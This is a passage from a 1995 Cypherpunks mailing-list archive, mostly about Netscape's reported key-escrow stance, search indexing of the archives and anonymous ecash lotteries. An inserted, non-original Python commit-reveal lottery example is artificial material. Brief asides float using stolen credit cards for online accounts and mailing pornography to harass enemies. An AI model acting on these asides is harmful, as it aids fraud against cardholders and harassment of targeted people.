enough to make that a credible possibility.  Display and memory costs
remain the major obstacles, but I think workable compromises could be
made.

This could be a potent opportunity for somebody like the AIM alliance
to make an end run around the Intel-Microsoft axis, if they were able to
take the long view and act decisively (yeah...fantasy).  Start with
something like the low end PPC602, develop a highly integrated chip set
for video, drive, RAM controller, modem,  etc... Surface mount on board
with RJ-11, USB and external monitor connector, include as much HD as
will fit within the target production cost. Throw in a SIMM or DIMM slot
for the option of supplementing the minimum included memory later.
Provide greyscale LCD standard with color dual-scan option.  Come up
with a _TIGHT_ fully native code subset of MacOS.  Add a compact
application suite including internet connectivity plus simple PIM and WP
functionality. Provide a coupon for a subsidiary online service cum
internet gateway, ala MSN. Sell the machine at a minimal margin over
cost, and view the entire venture as a way to gain broad market
presence. Market presence must have substantial worth, because
Netscape's stock is surely not being valued on its price-earnings
ratio.


>The only relevance of this whole topic to Cypherpunks is....is....minimal.


Well, perhaps.  I suppose I'm risking the chastisement of Cypherpunk
purists with my follow-up on this non-crypto topic. But it seems to me
that the broadest shared sentiment among the people on this list is a
passionate interest in defending and expanding personal liberty,
sovereignty and privacy in cyberspace, and the realization that
the unencumbered use of strong cryptography is indispensable to those
goals. If it wasn't for this nexus, there would be no cypherpunks, and
the esoteric technicalities of modern cryptography would be of interest
to few besides professional security consultants/programmers and obscure
academic types.  It's useful to explore the wider context of relevance
occasionally, if only to gain perspective (As long as we can avoid
another Ayn Rand or Noam Chomsky pissing match...).


ObCrypto:

People limited solely to diskless terminals for their internet access will
be second class netizens.  They would be less likely to really
appreciate and comprehend the issues surrounding online privacy and
cryptography, and they would be less able to take action on these issues
even if they wanted to.


- -Michael



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Thu, 30 Nov 1995 09:09:32 +0800
To: cypherpunks@toad.com
Subject: Re: Elliptic curves, patent status?
In-Reply-To: <199511290717.XAA29808@blob.best.net>
Message-ID: <199511300051.BAA26198@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Wei Dai (weidai@eskimo.com) wrote:
> On Mon, 27 Nov 1995, James A. Donald wrote:
>
> > > [are there patents that cover all public key cryptography?]
> >
> > No, but RSA will litigate you with the objective of
> > inflicting extravagant legal costs regardless.
>
> RSADSI no longer owns the Stanford patents (Hellman-Merkle,
> Diffie-Hellman) which they used to claim covered all public key 
> cryptography.  Those patents now belong to Cylink, who seems to be less 
> litigious.

Especially considering that they might lose the patents in a court case
next month.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 30 Nov 1995 16:47:58 +0800
To: Leslie Todd Masco <cypherpunks@toad.com
Subject: Re: META: Lycos & Searchable archives
Message-ID: <ace2aaae09021004dca7@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:56 AM 11/30/95, Leslie Todd Masco wrote:

>Someone has expressed concern to me that the cypherpunks archives are
>searchable via Lycos.  Said person doesn't mind having the archives
>searchable to the smaller audience of people who go to the web-site,
>but is unhappy about net-wide searches turning up cypherpunks articles.
>
>Can we try to find a consensus on this?  My initial inclination was to
>shrug the concern off (properties of information, etc, as well as c'punks
>being a more-or-less anarchy and the express desire for some sort of
>searching mechanism for c'punks), but I thought I'd double check as I've
>been mostly out of touch for the better part of a year.

I'm not sure how we'll find a consensus, and I don't relish the thought of
seeing hundreds of responses to your point, but....here's my vote.

I say any self-respecting Cypherpunk should realize immediately that
_every_ word one has ever posted to Usenet, mailing lists, and other public
or semi-public fora will soon be instantly retrievable. (The rates of
growth of the Net and of storage densities make it clear that archiving
_all_ past public messages is not much harder than archiving only the most
recent ones...thus, I predict, in 2005 one will be able to buy a disk or
disks of _all_ Usenet traffic prior to, say, 2003.)

More immediately, the person or persons who object to Lycos/Deja
News/Excite searches of their words face an uphill battle. Satisfying them
would mean making the various archive sites (currently only yours, Todd,
but other sites also store the traffic) unavailable.

So, I say: "Get with the program." Don't say anything under your True Name
that you don't want job interviewers to pull up in their pro forma searches
of your Usenet involvement.

(Thank God the U.S. has none of those damned "data privacy laws" which
might interfere with how people access the Net.)

--Tim May, who has said many, many controversial or even embarrassing things
over the years, but who thinks anyone offended by his comments is not
someone he would want to deal with anyway.

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 30 Nov 1995 17:03:02 +0800
To: sameer <cypherpunks@toad.com
Subject: Re: Netscape gives in to key escrow
Message-ID: <ace2ae070a021004a5e9@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:44 AM 11/30/95, sameer wrote:
>http://www.cnet.com/Central/News/govt.html
>
>        Bad. Very Bad. And I was almost starting to like Netscape.

Thank you Sameer for pointing this out.

Jim Clark is actively working for the enemies of liberty and freedom.
Consider this quote:

"To secure Net communications, the government will need to have access to
private data exchanges using what is known as a key escrow security system,
said Clark. He added that an invincible security system for the Net is
possible, but such a system won't be built unless the government has a
stake in it. "That's where key escrow comes in," said Clark."

Note that this is beyond the "watered down" forms of "commercial key
escrow" that many advocates of forms of key escrow often like to talk about
(such as the nominally voluntary schemes espoused by TIS). This speech by
Clark is actually closer to the real truth of key escrow that we normally
hear from public speakers: the government will need to have access,
therefore the key escrow will be mandatory, not voluntary.

Can Netscape continue to prosper? This latest issue won't kill it,
naturally, but I doubt a $5 billion market capitalization can persist when
a company has no technology that cannot be duplicated or bettered by
others. As an example, I use Netscape to do certain things, Eudora to do
other things, and Newswatcher to do still other things...I will switch to
an improved Web browser _much_ faster than I will switch to a new word
processor. I don't see much "staying power" inherent in Netscape's browser,
so I can't see how the company can maintain a market capitalization greater
than that of General Dynamics, CBS, and Apple.

I wonder what discussions Jim Clark has been having with the Feds?

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 30 Nov 1995 17:23:49 +0800
To: cypherpunks@toad.com
Subject: Re: ecash lottery (Was: ecash casino)
Message-ID: <ace2b2de0c021004c90a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:22 AM 11/30/95, Bill Frantz wrote:
>At 20:38 11/29/95 -0800, Timothy C. May wrote:
>>Have to be _very_ careful here. A variety of scams can be developed which
>>show lots of "small" winners, but which fail to show any large winners. The
>>lottery operators can make a lot of extra bucks by simply not paying off
>>the large winnings, in various ways.
>
>With complete anonymity, the scam I would think of first is giving other
>nyms of myself all the big payoffs.

Yes, this is a good example of one of the scams.

If the lottery can't/won't reveal True Names of winners--a basic design
criterion--then clearly people may have doubts.

The whole thing can be cast as follows:

"Send us money and we'll put your name in a hat. We'll let you know if you
win, but we won't tell the public who won." (This problem is quite similar
to voting protocols, so we might look to "fair voting" protocols for
ideas.)

My intuition (hand-waving) is that an anonymous lottery is possible, but I
haven't looked at the details. Certainly multiple trusted holders of keys
(escrow agents) would help make the lottery fair. Maybe bit commitment
would help (each player buys the right to play, then "commits" his number.
A public reading of the winning number occurs, and the winner can reveal
his winning number (anonymously if he wishes, providing he had registered
his hash....).

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."
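
[Added example, not part of the original post: one possible reading of the commit-then-reveal lottery sketched above, combined with the "multiple trusted holders" idea. It assumes SHA-256 hash commitments with per-ticket nonces, a public board of commitments, and a winning number derived from seeds that the drawing agents committed to before sales closed; the class, function names and NUMBER_RANGE are hypothetical.]

```python
import hashlib
import hmac
import secrets

NUMBER_RANGE = 1000  # assumed size of the ticket-number space


def commit(value: bytes, nonce: bytes) -> str:
    """Hash commitment over a length-prefixed nonce followed by the value."""
    prefix = len(nonce).to_bytes(2, "big")
    return hashlib.sha256(prefix + nonce + value).hexdigest()


def encode_number(number: int) -> bytes:
    """Fixed-width encoding so every ticket number hashes unambiguously."""
    return number.to_bytes(4, "big")


class Lottery:
    """Public state only: anyone can audit the boards and re-run the checks."""

    def __init__(self):
        self.ticket_board = []   # commitments to players' numbers
        self.seed_board = []     # commitments to the drawing agents' seeds
        self.sales_open = True
        self.winning_number = None

    def register_seed(self, commitment: str) -> None:
        # Agents must be bound to their seeds before they can see any outcome.
        if not self.sales_open:
            raise RuntimeError("seeds must be committed before sales close")
        self.seed_board.append(commitment)

    def register_ticket(self, commitment: str) -> None:
        if not self.sales_open:
            raise RuntimeError("sales are closed")
        # A copied commitment would make two tickets indistinguishable on the board.
        if commitment in self.ticket_board:
            raise ValueError("duplicate commitment")
        self.ticket_board.append(commitment)

    def draw(self, reveals) -> int:
        """reveals: (seed, nonce) pairs in seed_board order.

        The draw fails unless every agent opens the commitment it registered,
        so no single agent can pick the result after tickets are sold. An
        agent can still stall the draw by refusing to reveal; that needs a
        penalty or a threshold scheme, which this sketch does not model.
        """
        self.sales_open = False
        if len(reveals) != len(self.seed_board):
            raise ValueError("every committed seed must be revealed")
        digest = hashlib.sha256()
        for (seed, nonce), expected in zip(reveals, self.seed_board):
            if not hmac.compare_digest(commit(seed, nonce), expected):
                raise ValueError("revealed seed does not match its commitment")
            digest.update(seed)
        self.winning_number = int.from_bytes(digest.digest(), "big") % NUMBER_RANGE
        return self.winning_number

    def verify_claim(self, number: int, nonce: bytes) -> bool:
        """A winner proves ownership by opening a commitment already on the board.

        No name is involved: knowledge of the nonce is the only credential.
        """
        if self.winning_number is None or number != self.winning_number:
            return False
        claimed = commit(encode_number(number), nonce)
        return any(hmac.compare_digest(claimed, c) for c in self.ticket_board)


if __name__ == "__main__":
    lottery = Lottery()

    # Two drawing agents commit to random seeds (constructed sample data).
    agents = [(secrets.token_bytes(32), secrets.token_bytes(16)) for _ in range(2)]
    for seed, nonce in agents:
        lottery.register_seed(commit(seed, nonce))

    # A player commits to number 417. The random nonce matters: with only
    # NUMBER_RANGE possible numbers, an unsalted hash could be brute-forced.
    my_number, my_nonce = 417, secrets.token_bytes(16)
    lottery.register_ticket(commit(encode_number(my_number), my_nonce))

    winner = lottery.draw(agents)
    print("winning number:", winner)
    print("my claim accepted:", lottery.verify_claim(my_number, my_nonce))
```
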






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Fri, 1 Dec 1995 09:12:40 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Applied Cryptography Questions
In-Reply-To: <199511300614.HAA08769@utopia.hacktic.nl>
Message-ID: <199511300754.CAA12171@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous (hence the public reply) writes:
> A couple questions about Applied Cryptography (Second Edition)

I only have the 1st, but I won't consult it for this anyway....

> 1. What on earth is a Neural Net?

This sounds like a troll, since we recently had a thread about the possible
use of neural nets in cryptographic applications, and the precise text used
in AC2 to discuss this matter. Very roughly, a neural net is an abstract 
model of a network of neurons in a brain, used in artificial intelligence as
a model of computation. I imagine you could easily have found more complete
information by doing some trivial net search for "neural net".

> 2. Consider the Chinese Lottery attack vs a processor bank.
> 
>    ADVANTAGES
>      Distributed computing, no easy bombing target.
> 
>    DISADVANTAGES
>      39% inefficient
>      Need specialized hardware [for speed] or transmission of algorithms
>        for any specific algorithm
>      Not on all the time
>      If value(crack) * cracks/chip > cost of chip, then why not have
>        the gov buy the chips? It's probably cheaper that way.

Well, is it in fact "probably cheaper" ?  If value(crack) > cost(chip) >
cost(attack) then the attack makes more sense....

> 4. Does there exist an n such that a keyspace of 2^n is trivial to crack
>    [ie a matter of minutes] on a PC but is difficult to crack for a 
>    big commercial company or even a major government? [this question
>    relates to Merkle's puzzles, when a 40-bit key seems a bit weak.]

I think you need to explain more for this question to make sense. Obviously
companies (even big ones) and governments (even major ones) could buy and use
PCs themselves, in the event that conferred some cryptanalytic advantage.

ObLycos: Hey, better still, let's put the archives in an export-controlled
directory. We don't want too many outsiders to hear about the privacy
advantages of strong cryptography, now do we ?

ObAlices: <yawn>

-Futplex <futplex@pseudonym.com>
"I look pretty young but I'm just backdated" -The Who




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 30 Nov 1995 16:20:41 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <199511300644.WAA02011@infinity.c2.org>
Message-ID: <199511300807.DAA12251@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


sameer writes:
> http://www.cnet.com/Central/News/govt.html

I think this is sufficiently important for a partial quotation:

---------------------------------------------
By Anne Knowles 	November 29, 1995, 12 p.m. PT

   BOSTON--Getting the government involved in maintaining Internet data
 privacy may not be popular, but it's going to be necessary. That's the message
 Netscape Communications chair Jim Clark delivered this morning in his keynote
 address to an audience here at Email World and Internet Expo. 

   To secure Net communications, the government will need to have access to
 private data exchanges using what is known as a key escrow security system,
 said Clark. He added that an invincible security system for the Net is 
 possible, but such a system won't be built unless the government has a stake 
 in it. "That's where key escrow comes in," said Clark. 
---------------------------------------------

> 	Bad. Very Bad. 

Agreed. As of a moment ago I could find absolutely no mention of this on
Netscape's web pages. I hope they will at least have the courage to put out a
"We Support Clipper II" press release. Now the question is, how much of a
role does Netscape Communications intend to play in implementing GAK, and
what can we do to counter it ?

-Futplex <futplex@pseudonym.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 30 Nov 1995 21:02:47 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: The future will be easy to use
In-Reply-To: <199511300704.XAA01742@blob.best.net>
Message-ID: <199511300819.DAA10897@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Jon Lasser writes:
> However, if you have optional linking of ID and name, shippers will only 
> ship to keys with such attributes. Because just ID and address, it could 
> be a "hit and run" type attack shipped to a safe maildrop.

People who steal credit cards prefer to order goods to be delivered somewhere
they can grab them. (Often this is just the front of the rightful owner's
home, while Holly the Homeowner is off at work.) But that's just another
reason to cut down unauthorized credit card charges, not a reason to restrict
what a rightful cardholder can do with the card. I _want_ to be able to have
stuff delivered to arbitrary locations, and I _don't_ want to give that up
just to make it tough on thieves.

James Donald writes:
> This argument makes no sense at all:  I am going to attack my
> enemies by paying people to send books, computers, and stuff
> to them?

Ordering hardcore porno videos to be sent to, say, somewhere in Tennessee
might work pretty well in our sadly repressed society.

-Futplex <futplex@pseudonym.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Thu, 30 Nov 1995 17:29:36 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <ace2ae070a021004a5e9@[205.199.118.202]>
Message-ID: <199511300918.EAA13821@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



  What's the point? Surely Clark must realize that even if Netscape
adds key escrow to SSL/Secure Courier, it is still possible to tunnel
real encryption through that link thus thwarting the escrow system.
In fact, this is the perfect job for Java:

1) Client connects to server thru insecure key-escrow channel and downloads
Java applet
2) Java applet opens new connection to server using "invincible" security
as Clark puts it, and performs add transactions on this channel. In fact,
in the future, a large number of "forms" will be Java applets which
submit information back to the server themselves.

  And what about IPSEC ESP? Even if the application layer is weak,
the link layer can more than make up for it.

  Now, Netscape has momentum, and if they set a key-escrow standard, there
is a chance of it being adopted widely. However, Java applets and IPSEC
can still make transactions through an insecure netscape payment/encryption
channel.

  The genie is out of the bottle.

-Ray






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 30 Nov 1995 22:58:26 +0800
To: cypherpunks@toad.com
Subject: Quit it!
Message-ID: <199511300520.GAA07040@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


I am me!  

No I am not!

Yes I am!

No I'm not!  

  Alice de 'nonymous ...
  
                                    ...just another one of those...
  
  
  P.S.  This post is in the public domain.
                      C.  S.  U.  M.  O.  C.  L.  U.  N.  E.
  
  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Thu, 30 Nov 1995 19:31:21 +0800
To: Leslie Todd Masco <cactus@hks.net>
Subject: Re: META: Lycos & Searchable archives
In-Reply-To: <199511300556.AAA15009@bb.hks.net>
Message-ID: <Pine.3.89.9511300640.B15267-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 30 Nov 1995, Leslie Todd Masco wrote:

> Someone has expressed concern to me that the cypherpunks archives are
> searchable via Lycos.  Said person doesn't mind having the archives
> searchable to the smaller audience of people who go to the web-site,
> but is unhappy about net-wide searches turning up cypherpunks articles.

Lycos only has a database of abstracts of the archive (which is still 
commendable) and the other databases have smallish local archives of the list. 
There's no way to do a compleat search at present (other than manual labor and 
writing 'bots). A true search engine at the site would be a godsend. 
I presume that people who post want their posts read.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 30 Nov 1995 19:53:07 +0800
To: sameer <cypherpunks@toad.com
Subject: Re: Netscape gives in to key escrow
Message-ID: <2.2b8.32.19951130114416.00950858@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:44 PM 11/29/95 -0800, sameer wrote:
>http://www.cnet.com/Central/News/govt.html
>
>	Bad. Very Bad. And I was almost starting to like Netscape.
>

But I did like the story's description of Damien Doligez as a "group of
French scientists."

DCF

"Who used to have a personal life but who now does nothing but download Beta
upgrades from the Net."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Thu, 30 Nov 1995 21:09:31 +0800
To: cypherpunks@toad.com
Subject: Re: The future will be easy to use
In-Reply-To: <199511300819.DAA10897@opine.cs.umass.edu>
Message-ID: <96oDFD11w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


futplex@pseudonym.com (Futplex) writes:
> People who steal credit cards prefer to order goods to be delivered somewhere
> they can grab them.

For most goods, yes. But one could use a stolen credit card, e.g., to set
up an account on AOL / CompuServe and download tons of software, charging
it to the card.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 30 Nov 1995 14:32:34 +0800
To: cypherpunks@toad.com
Subject: Applied Cryptography Questions
Message-ID: <199511300614.HAA08769@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


A couple questions about Applied Cryptography (Second Edition)

1. What on earth is a Neural Net?

2. Consider the Chinese Lottery attack vs a processor bank.

   ADVANTAGES
     Distributed computing, no easy bombing target.

   DISADVANTAGES
     39% inefficient
     Need specialized hardware [for speed] or transmission of algorithms
       for any specific algorithm
     Not on all the time
     If value(crack) * cracks/chip > cost of chip, then why not have
       the gov buy the chips? It's probably cheaper that way.

3. How does one cryptanalyze a Feistel Network? I've read a bit
   on this and it doesn't seem that the papers are consistent,
   for example, one claims that 2^32 chosen plaintext is unreasonable
   for a 64-bit block cipher whereas DES's cryptanalysis requires
   something like 2^42.

4. Does there exist an n such that a keyspace of 2^n is trivial to crack
   [ie a matter of minutes] on a PC but is difficult to crack for a 
   big commercial company or even a major government? [this question
   relates to Merkle's puzzles, when a 40-bit key seems a bit weak.]

5. Is there an errata yet?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Fri, 1 Dec 1995 16:49:11 +0800
To: Jeff Weinstein <jsw@netscape.com>
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <199511300644.WAA02011@infinity.c2.org>
Message-ID: <9511301328.AA01664@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Jeff Weinstein writes:
 > have lots of stuff attributed to Jim, but very little of it is actual
 > quotes.


Well, if there was in fact a speech made from which the pseudo-quotes
in the article were taken, then surely the full text of that speech
will be made available somewhere for clarification.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sat, 2 Dec 1995 03:34:01 +0800
To: cypherpunks@toad.com
Subject: Re: GAK Flap Happening at a Good Time--Journalists Read!
Message-ID: <199512011556.HAA08776@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 03:01 AM 12/1/95 -0800, Timothy C. May wrote:
>I hope the media types reading now will attend the December 5th (I
>think...details should be available) gathering on "key escrow" in
>Washington. D.C. This should be a fiery meeting, especially if the Netscape
>reps (I assume someone from Netscape will be attending, given their central
>role in the all-important Web world) either denounce GAK or support GAK.


I will prepare the netscape dehanced dirty pictures web page, 
but not advertize the URL until shortly after December 5th.

I hope to hear a suitable "clarification" before then.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 1 Dec 1995 00:54:27 +0800
To: s1113645@tesla.cc.uottawa.ca
Subject: Re: Credit card theft Re: The future will be easy to use
In-Reply-To: <Pine.3.89.9511300805.B35014-0100000@tesla.cc.uottawa.ca>
Message-ID: <199511301606.IAA17493@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> Or c2.org, which might then make things interesting if the theft is detected.
> (in a very perverse, and tooth-gnashingly aggravating way, of course).
> Would Sameer cooperate with the LEAs to catch "an anonymous suspect using
> his service"? 

	Community ConneXion will comply with all properly formed court
orders and subpoenas. We will *not* cooperate without court
intervention. (I.e. Mr. FBI calls up and says "can you help us find
this suspect"? I respond "got a subpoena?")

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 1 Dec 1995 00:53:51 +0800
To: jsw@netscape.com (Jeff Weinstein)
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <30BD716E.5F69@netscape.com>
Message-ID: <199511301616.IAA18452@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	Can we get the text of the actual speech?

Unless Netscape officially issues a statement on their home page, and
as a press release, saying that the press coverage was wrong and
Netscape is *against* any and all forms of GAK, then I think we should
assume that Netscape's official position is in favor of GAK, and speak
out about it as such.

	It is very damn close to the wire. Even though the speech may
have been misreported, it is the reporting that affects public
opinion. Even if Netscape has no current products or plans to release
products implementing GAK, in light of this press coverage, unless
they issue a statement saying they are against GAK, then they are for
GAK.
	I haven't given up on Netscape, yet-- I'm waiting for an
official word.

	Jeff: If Netscape comes out in favor of GAK, will you leave?
(Wait until February, at least, of course..) You don't have to answer
that to me, or the list, just think about it, and answer it for
yourself.  Do you think "anyone else" there would leave, as you say
below that they don't want to go down in history, etc...

> 
> sameer wrote:
> > 
> > http://www.cnet.com/Central/News/govt.html
> > 
> >         Bad. Very Bad. And I was almost starting to like Netscape.
> 
>   Please don't give up on us yet.  All press accounts I've read so far
> have lots of stuff attributed to Jim, but very little of it is actual
> quotes.  There appears to be lots of paraphrasing and interpretation
> being done on the part of the reporters.  The impression that I'm
> getting is that the press has blown a couple of small sound bites
> way out of proportion.  The infoworld article that covers the same
> speech only devotes about 20% of the article to the key escrow topic,
> and is similarly devoid of actual quotes.
> 
>   I have not spoken to Jim about this, and I did not hear the talk
> myself, so I'm mostly reading between the lines here.  After I saw the
> story earlier today I started asking around to see if the company
> had made any major policy shift in the direction of GAK, and wasn't
> able to turn up anything.  If anything it's the opposite.
> 
>   My feelings about key escrow, which were echoed by several folks
> in management when I spoke to them today are:
> 
> 	o Government mandated escrow would be a bad thing
> 	o There are some settings where escrow is good, in the corporate
> 		setting, or as a matter of person choice(to protect against
> 		loss of password)
> 	o The whole issue of escrow should be de-coupled from the
> 		export issue
> 
>   I don't want to go down in history as a facilitator of the totalitarian
> state, and I don't think anyone else here does either.  I hope folks
> wait for press releases, product announcements, etc. before condemning us
> too much.  Jim has made comments in the past that were quoted out of
> context, and blown way out of proportion to the point that some people
> believed that we were monitoring our user's every keystroke and sending
> it all back to the home office to generate huge demographic databases.
> I suspect that this is the same sort of thing, and I hope everyone will
> judge us by what we do.
> 
> 	--Jeff
> 
> PS - you won't find a LEF in the soon to be released SSL Version 3 spec...
> 
> -- 
> Jeff Weinstein - Electronic Munitions Specialist
> Netscape Communication Corporation
> jsw@netscape.com - http://home.netscape.com/people/jsw
> Any opinions expressed above are mine.
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 30 Nov 1995 21:37:42 +0800
To: cypherpunks@toad.com
Subject: RED_sky
Message-ID: <199511301327.IAA13236@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   11-30-95. W$Jiver, Page One lead:

   "New Satellite Imaging Could Soon Transform The Face of the
   Earth. Big Worries About Security."

      Next time you gaze into the heavens, practice your
      smile. The ventures being backed by companies such as
      Lockheed Martin Corp., the E-Systems Corp. and Orbital
      Sciences Corp. will offer days-old digital images of
      unprecedented clarity. These corporate systems worry
      some scientists and federal policy makers concerned
      about privacy invasion and a free-for-all expansion of
      espionage. One notes that Lockheed Martin and E-Systems
      already have such systems in space. "They do this for
      the intelligence agencies. The very system that they're
      putting up there is a classified system now."

      A Senate staffer says that as budgets are chopped for
      the NRO and military satellite operators, the commercial
      systems will offer lower-cost images for government
      needs, preserve jobs and know-how in a vital area of
      technology and ensure U.S. leadership in the imaging
      industry. Nations such as France, Russia, South Africa,
      India and Israel are contemplating expanded use of their
      high-resolution systems.

   RED_sky  (16 kb)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Holovacs <holovacs@styx.ios.com>
Date: Thu, 30 Nov 1995 21:52:39 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <ace2ae070a021004a5e9@[205.199.118.202]>
Message-ID: <Pine.3.89.9511300825.A27268-0100000@styx.ios.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 30 Nov 1995, Timothy C. May wrote:

> 
> Can Netscape continue to prosper? This latest issue won't kill it,

I suspect this will unfortunately help. Stockholders are interested in 
profits, not principles. Co-oping with the feds will help Netscape get to 
the commercial market sooner, and most customers, sadly, don't give a damn 
about privacy (or don't understand).

Jay Holovacs <holovacs@ios.com>
PGP Key fingerprint =  AC 29 C8 7A E4 2D 07 27  AE CA 99 4A F6 59 87 90 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 1 Dec 1995 01:42:15 +0800
To: dmandl@bear.com (David Mandl)
Subject: Re: "Got a subpoena?"
In-Reply-To: <Pine.SUN.3.91.951130113015.132b-100000@goya>
Message-ID: <199511301704.JAA23295@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> "finessing" laws will become more important.  In short, they WILL have
> a subpoena--then what?

	Then they'll find out that I don't have any information that
could help them, anyway.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Fri, 1 Dec 1995 11:31:34 +0800
To: Anonymous <nobody@REPLAY.COM>
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <199511300849.JAA13845@utopia.hacktic.nl>
Message-ID: <Pine.SUN.3.91.951130090706.26033A-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


